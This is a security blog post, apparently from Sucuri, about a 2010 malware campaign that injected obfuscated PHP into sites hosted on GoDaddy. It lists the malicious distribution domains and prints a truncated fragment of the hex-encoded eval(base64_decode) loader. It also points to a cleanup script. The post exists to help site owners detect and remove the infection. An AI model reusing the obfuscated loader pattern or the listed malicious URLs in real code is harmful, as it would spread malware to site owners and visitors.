Attacks on GoDaddy sites – insomniaboldinfoorg.com

UPDATE: As of 4AM Pacific, on November 3rd, we’ve received various reports of another related outbreak of exploited sites on GoDaddy. We’re currently researching the issue and will provide updated scripts if necessary. Please comment below if you have been affected, or if you have any information on the exploit.


Just a quick update to this blog post: More Attacks – insomniaboldinfocom.com.

We posted a few days ago that attackers were using insomniaboldinfocom.com to spread malware to multiple web sites. Today, they changed domains and are targeting GoDaddy sites using insomniaboldinfoorg.com.

The following domains/IP addresses are being used to spread the attack:

http://insomniaboldinfoorg.com/ll.php?k=1

www3.hope-soft57.net
www3.new-protectionsoft23.in
www4.free-pc-protection9.in

http://insomniaboldinfocom.com/mm.php

http://insomniaboldinfonet.com/mm.php

www3.large-defense1.in


All the sites we’ve seen so far have the following code added to all PHP files:

$_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f..
\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";..
$_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY..

Which is basically just the eval(base64_decode encoded. What is interesting is that this site is hosted at 77.78.239.53, which was used on previous attacks by the “Hilary Kneber” group, so we think they are all related:

myblindstudioinfoonline.com
meqashoppercom.com
insomniaboldinfocom.com

Clean Up Action

The following script should clean up any infected site:

Updated 10/31/10 14:25 Pacific.

If you don’t have SSH access, download this file to your desktop: GoDaddy Fix 10/31/10

Once you have the file downloaded, rename gdd-fix_php.txt to gdd-fix_php.php

Upload fix file to your site via FTP/sFTP, then open in your browser (Example: http://yoursite.com/gdd-fix_php.php)

This script will take a few minutes to complete, but will scan your whole site and remove the malware entries.


For old exploits please check out our Simple Cleanup Solution


If you need help cleaning up your site, contact us at support@sucuri.net or at http://sucuri.net

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.